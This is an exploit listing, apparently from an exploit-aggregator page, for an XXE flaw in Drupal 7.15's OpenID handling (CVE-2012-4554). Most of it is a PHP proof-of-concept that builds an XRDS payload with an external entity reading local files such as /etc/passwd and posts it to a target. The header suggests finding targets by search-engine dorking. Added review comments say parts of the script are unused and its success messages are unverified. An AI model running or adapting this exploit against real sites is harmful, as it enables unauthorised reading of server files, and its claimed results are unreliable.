## https://sploitus.com/exploit?id=PACKETSTORM:189779
=============================================================================================================================================
| # Title : Drupal 7.15 via OpenID XXE vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://new.drupal.org/home |
=============================================================================================================================================
POC :
[+] Dorking in Google or other search engine.
[+] Code Description: XXE vulnerability in Drupal via OpenID
(Related : https://packetstorm.news/files/id/180671/ Linked CVE numbers: CVE-2012-4554 ) .
[+] save code as poc.php.
[+] Set target : line 66
[+] PayLoad :
<?php
/**
* XXE vulnerability exploit for Drupal via OpenID
*/
/**
 * Submit Drupal's login-block form with an OpenID identifier and return the raw reply.
 *
 * Sends a POST to <target>/?q=node&destination=node carrying
 * form_id=user_login_block, empty name/pass fields and the caller's value in
 * openid_identifier.
 *
 * NOTE(review): nothing in the visible script calls this function.
 *
 * Defender note: on a site that still enables the OpenID module, a login-block
 * POST whose openid_identifier names an unfamiliar host is a request shape
 * worth alerting on.
 *
 * @param string $target_uri Base URL of the Drupal site; a trailing slash is stripped.
 * @param string $identifier Value placed in the openid_identifier form field.
 * @return string|bool Response body, or false when curl_exec() fails.
 */
function send_openid_auth($target_uri, $identifier) {
    $form_fields = [
        "openid_identifier" => $identifier,
        "name" => "",
        "pass" => "",
        "form_id" => "user_login_block",
        "op" => "Log in"
    ];
    $endpoint = rtrim($target_uri, '/') . "/?q=node&destination=node";

    $handle = curl_init();
    curl_setopt_array($handle, [
        CURLOPT_URL => $endpoint,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => http_build_query($form_fields),
        CURLOPT_RETURNTRANSFER => true,
    ]);
    $reply = curl_exec($handle);
    curl_close($handle);

    return $reply;
}
/**
 * Build the XRDS document used by this proof of concept.
 *
 * The document declares an external entity named xxe that points at
 * file://<file_path> and references it inside the <URI> element of a single
 * OpenID 2.0 signon service. $file_path is interpolated as-is, with no
 * escaping.
 *
 * Defender note: the inline DOCTYPE with an ENTITY ... SYSTEM declaration is
 * the recognisable marker; an XRDS document has no legitimate need for one.
 * Mitigation lives on the parsing side: untrusted XRDS must be parsed with
 * DTD / external-entity resolution disabled, and the affected Drupal release
 * (7.15 per this advisory, CVE-2012-4554) updated per the vendor advisory.
 *
 * @param string $file_path Path placed after the file:// scheme in the entity.
 * @return string The XRDS document as one unbroken string.
 */
function generate_xrds($file_path) {
    // Namespace values are the example.com strings hard-coded by the author
    // (the original comment says they were set to "valid values").
    $xrds_ns = "xri://example.com/xrds";
    $xrd_ns = "xri://example.com/xrd";
    $v = "2.0";

    // Assemble the fragments in document order and join them without separators.
    $fragments = [
        "<?xml version='1.0' encoding='UTF-8'?>",
        "<!DOCTYPE foo [ <!ELEMENT URI ANY> <!ENTITY xxe SYSTEM 'file://$file_path'> ]>",
        "<xrds:XRDS xmlns:xrds='$xrds_ns' xmlns='$xrd_ns*($v)' xmlns:openid='http://openid.net/xmlns/1.0'>",
        "<XRD><Service><Type>http://specs.openid.net/auth/2.0/signon</Type>",
        "<URI>&xxe;</URI></Service></XRD></xrds:XRDS>",
    ];

    return implode('', $fragments);
}
/**
 * POST the generated XRDS document to <target>/malicious.xrds and look for a
 * <URI> element in whatever the server sends back.
 *
 * NOTE(review): nothing visible here shows that the target parses a document
 * delivered this way, so the three return strings below are unverified
 * claims about the outcome — confirm against the vendor advisory before
 * relying on this script for triage.
 *
 * Defender note: requests for a path ending in /malicious.xrds with
 * Content-Type application/xrds+xml are a direct signature of this script.
 *
 * @param string $target_uri Base URL of the Drupal site; a trailing slash is stripped.
 * @param string $file_path  Path handed to generate_xrds() for the entity declaration.
 * @return string Text of the first <URI>...</URI> match in the response, or one
 *                of the two fixed failure messages.
 */
function exploit_xxe($target_uri, $file_path) {
    $document = generate_xrds($file_path);
    $endpoint = rtrim($target_uri, '/') . "/malicious.xrds";

    $handle = curl_init();
    curl_setopt_array($handle, [
        CURLOPT_URL => $endpoint,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => $document,
        CURLOPT_HTTPHEADER => ['Content-Type: application/xrds+xml'],
        CURLOPT_RETURNTRANSFER => true,
    ]);
    $body = curl_exec($handle);
    curl_close($handle);

    // No <URI> tag in the response at all: report failure.
    if (strpos($body, "<URI>") === false) {
        return "Exploit failed or file not readable.";
    }

    // An opening tag was seen; take the text of the first complete element.
    preg_match('/<URI>(.*?)<\/URI>/', $body, $found);
    if (isset($found[1])) {
        return $found[1];
    }
    return "File content not found.";
}
// Script driver: both values are hard-coded — an example.com placeholder URL
// and the file path passed through to the entity declaration.
$target = "http://example.com/drupal";
$file_to_read = "/etc/passwd";

// The label is printed whatever exploit_xxe() returns, including its failure
// messages, so this output line alone does not show that anything was read.
echo "Extracted File Content:\n" . exploit_xxe($target, $file_to_read);
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================